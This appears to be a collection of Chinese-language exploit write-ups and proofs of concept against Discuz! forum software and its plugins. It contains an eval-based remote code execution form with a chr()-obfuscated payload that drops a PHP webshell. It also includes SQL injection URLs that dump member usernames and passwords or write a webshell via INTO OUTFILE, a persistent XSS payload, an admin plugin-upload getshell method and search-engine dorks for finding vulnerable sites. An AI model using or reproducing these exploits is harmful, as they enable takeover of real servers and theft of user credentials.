if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
updatesession();
dheader("location: ".str_replace('&amp;', '&', $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = '';
}
if(in_array($extra, array('HALTED', 'NOPERM'))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language('messages');
$vars = explode(':', $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化可以自定义from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? 'ajax_' : '';
eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
unset($pre);
}
......
}
二、DZ的全局机制导致了未初始化的参数可以任意提交
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
三、misc.php正好有个可以自定义message的点其实也是未初始化
elseif($action == 'imme_binding' && $discuz_uid) {
if(isemail($id)) {
$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
$msn = explode("\t", $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
$msn = "$msn[0]\t$id";
$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
showmessage('msn_binding_succeed', 'memcp.php');
} else {
if($result == 'Declined') {
dheader("Location: memcp.php");
} else {
showmessage($response['result']);//$response没有初始化可以自定义from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(':', $message);然后message可以自己控制于是就很容易了参数是两个自定义的数组。
下面是HTML测试代码
<form method="post" action="http://bbs.XXXX.com/misc.php" enctype="multipart/form-data">
帖子ID指定一个存在的帖子即可<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
forumdata/cache/usergroup_01.php cmd 生成的一句话


@ -0,0 +1,64 @@
Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞
[Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞 全文]
简要描述:
Discuz! 7.2/X1 心情墙插件SQL注入及持久型XSS漏洞。
SQL注入比较鸡肋要求GPC为off目前这样的网站几乎绝版了
XSS因为是持久型的只要管理员打开此应用即会触发。利用XSS怎么操作就见仁见智了。
详细说明:
由Discuz认证的http://addons.discuz.com/workroom.php第三方开发团队“潮流少年工作室 Teen Studio”出品的心情墙插件http://www.discuz.net/forum.php?mod=viewthread&tid=1632898因变量未初始化及过滤不严导致SQL注入及跨站脚本漏洞。
moodwall.inc.php
SQL注入,除下面代码这一处外,本文件还有很多处这样的或是$_POST得到后直接用的情况。惨不忍睹。
elseif($action == ''edit_mood'' && moodid) {
//moodid未初始化直接代入sql查询
$check = $db->result_first("SELECT * FROM {$tablepre}moodwall WHERE id=''$moodid'' AND uid=''$discuz_uid''");
if(!$check || !$moodid) {
showmessage(''moodwall:moodwall_inc_php_2'', ''plugin.php?id=moodwall&action=user_mood'');
}
$sql = "SELECT * FROM {$tablepre}moodwall WHERE id=''$moodid''";
$query = $db->query($sql);
$moodlist_edit = array();
while($mood_edit = $db->fetch_array($query)) {
$moodlist_edit[] = $mood_edit;
}
XSS
$uid=$_POST[uid];
$username=$_POST[username];
$bgpic=$_POST[bgpic];
$mood=$_POST[mood];
$message=$_POST[message];
$dateline=time();
//$_POST得到数据直接入库前端出库代码也没有做过滤这里就不贴了。
$db->query("INSERT INTO {$tablepre}moodwall (uid,username, bgpic, mood, message, dateline) VALUES (''$uid'', ''$username'', ''$bgpic'', ''$mood'', ''$message'', ''$dateline'')");
漏洞证明:
随意找一个安装此应用的网站:
/plugin.php?id=moodwall&action=edit_mood&moodid=2''
发表心情处直接插入html代码
"><script>alert(/xss/)</script>


@ -0,0 +1,9 @@
Discuz!账号发放插件注入0day
件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
作者CN.Tnik&Tojen(俺俩老乡)
版本:最新版
Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php


@ -0,0 +1,20 @@
Discuz7.X通杀0day漏洞(UCenter Home-2.0)
2012年7月16日
评论发表评论
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&amp;shopid=
Vuln file : Shop.php
===================================================================
利用POC
shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


@ -0,0 +1,12 @@
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day
discuz x1.5 discuz 7.2 后台getshell 0day通杀版
方法为:
后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)
然后确认
shell地址就为data/plugindata/shell.lang.php (discuz x1.5 )
shell地址就为forumdata/plugins/shell.lang.php (discuz 7.2)
http://www.st999.cn/blog/tools/discuzshell.rar


@ -0,0 +1,32 @@
discuz! 7.2 manyou插件暴路径&Get Webshell 0day
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中没有对传入的参数进行检查在GPC为off的情况下导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

CMS/Discuz/dz/MSWINSCK.OCX Normal file


CMS/Discuz/dz/dz.exe Normal file
